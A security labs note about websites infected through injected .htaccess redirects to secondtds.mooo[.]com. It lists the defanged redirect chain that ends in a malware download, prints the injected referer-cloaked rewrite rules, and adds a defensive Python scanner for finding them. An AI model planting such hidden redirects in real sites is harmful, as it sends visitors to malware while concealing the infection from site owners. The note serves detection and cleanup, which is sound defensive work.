Secondtds.mooo[.]com .htaccess redirects

Labs Note

We are finding many sites infected with malicious redirects inside their .htaccess file, pointing to secondtds.mooo[.]com/go.php?sid=3. That domain is a TDS (traffic distribution system, i.e. a redirect controller) which forwards visitors on to another website that pushes the browser to download this malware: https://www.virustotal.com/en/file/0b6eab15961f92da95a0a4b0d55fee8a8bd0eb39fec1027aa43575802d7a199e/analysis/1441223870/

The redirect chain is:

secondtds.mooo[.]com
downserver.ignorelist[.]com
pastdownload[.]com
stds1new.computersoftwarelive[.]com
download.pastdownload[.]com
files.september-master-3[.]xyz

Here is the .htaccess content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} go.mail.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*nigma.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
..
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://secondtds[.]mooo.com[/]go.php?sid=2 [R=301,L]

The attack is quite buggy and doesn't check whether a site is already infected, which is why we see multiple identical redirect rules stacked in the same .htaccess file. Note also that the redirect only fires when the Referer header matches one of the search-engine patterns, so an administrator opening the site directly will not see it.
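The following scanner is an added example written for this note; it is not Sucuri's tooling and not part of the original post. It parses .htaccess text the way a defender would triage it: it collects the RewriteCond lines that test %{HTTP_REFERER}, flags any following RewriteRule whose target is an absolute URL on a host that is not one of the site's own, and counts how many times the same off-site target repeats, which catches the stacked duplicate rules described above. The hint word list, the function names and the sample .htaccess (which uses the defanged domain from this note alongside two constructed, legitimate rules for www.example.com) are all constructed for the example.

```python
"""Triage .htaccess content for referer-conditioned redirects to off-site hosts.

Added example: heuristic scanner, not Apache's own parser. A RewriteCond only
applies to the next RewriteRule, so any other directive resets the chain.
"""
import re
from collections import Counter
from urllib.parse import urlparse

# Substrings seen in the referer conditions of this campaign (constructed list,
# taken from the patterns quoted in the note). Used only to annotate findings.
SEARCH_REFERER_HINTS = ("aol", "mail", "hotbot", "bing", "goto", "infoseek", "nigma",
                        "mamma", "aport", "search", "metacrawler", "dogpile")

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.IGNORECASE)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.IGNORECASE)


def refang(target: str) -> str:
    """Undo [.] and [/] defanging so the URL parses; real infections are not defanged."""
    return target.replace("[.]", ".").replace("[/]", "/")


def scan_htaccess(text: str, own_hosts: set) -> list:
    """Return one finding per RewriteRule that sends visitors to a host outside own_hosts.

    Each finding records the target, how many RewriteCond %{HTTP_REFERER} lines
    guard it, and how many of those look like search-engine referer checks.
    """
    findings = []
    pending_conds = []
    for line in text.splitlines():
        cond = COND_RE.match(line)
        if cond:
            pending_conds.append(cond.group(1))
            continue
        rule = RULE_RE.match(line)
        if rule:
            target = refang(rule.group(2))
            parsed = urlparse(target)
            # Only absolute http(s) targets can send the visitor off-site.
            if parsed.scheme in ("http", "https") and parsed.hostname \
                    and parsed.hostname.lower() not in own_hosts:
                hits = sum(1 for c in pending_conds
                           if any(h in c.lower() for h in SEARCH_REFERER_HINTS))
                findings.append({
                    "host": parsed.hostname.lower(),
                    "path": parsed.path,
                    "query": parsed.query,
                    "referer_conditions": len(pending_conds),
                    "search_engine_conditions": hits,
                    "flags": rule.group(3) or "",
                })
            pending_conds = []
        elif line.strip() and not line.strip().startswith("#"):
            # Any other directive (RewriteCond on another variable, RewriteEngine,
            # etc.) breaks the RewriteCond -> RewriteRule chain.
            pending_conds = []
    return findings


def duplicate_targets(findings: list) -> Counter:
    """Count identical off-site targets; >1 means the injector ran more than once."""
    return Counter((f["host"], f["path"], f["query"]) for f in findings)


# Constructed sample: two benign rules for the site itself, then the injected
# block from the note pasted twice, as the "buggy" re-infection leaves it.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteRule ^index\\.php$ / [R=301,L]
RewriteCond %{HTTP_HOST} ^example\\.com$
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://secondtds[.]mooo.com[/]go.php?sid=2 [R=301,L]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://secondtds[.]mooo.com[/]go.php?sid=2 [R=301,L]
"""

OWN_HOSTS = {"example.com", "www.example.com"}

if __name__ == "__main__":
    results = scan_htaccess(SAMPLE_HTACCESS, OWN_HOSTS)
    for f in results:
        print(f"off-site redirect to {f['host']}{f['path']}?{f['query']} "
              f"guarded by {f['referer_conditions']} referer conditions "
              f"({f['search_engine_conditions']} search-engine-like) [{f['flags']}]")
    for (host, path, query), n in duplicate_targets(results).items():
        if n > 1:
            print(f"target {host}{path}?{query} appears {n} times (stacked rules)")
```

The own-host allow-list is what keeps canonical www redirects out of the report; in practice populate it from the vhost's ServerName and ServerAlias values. Because the malicious rule is gated on the Referer header, checking the file is more reliable than browsing the site, which is why a file-level scan like this belongs in the cleanup checklist.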

If you find this code, remove it right away!
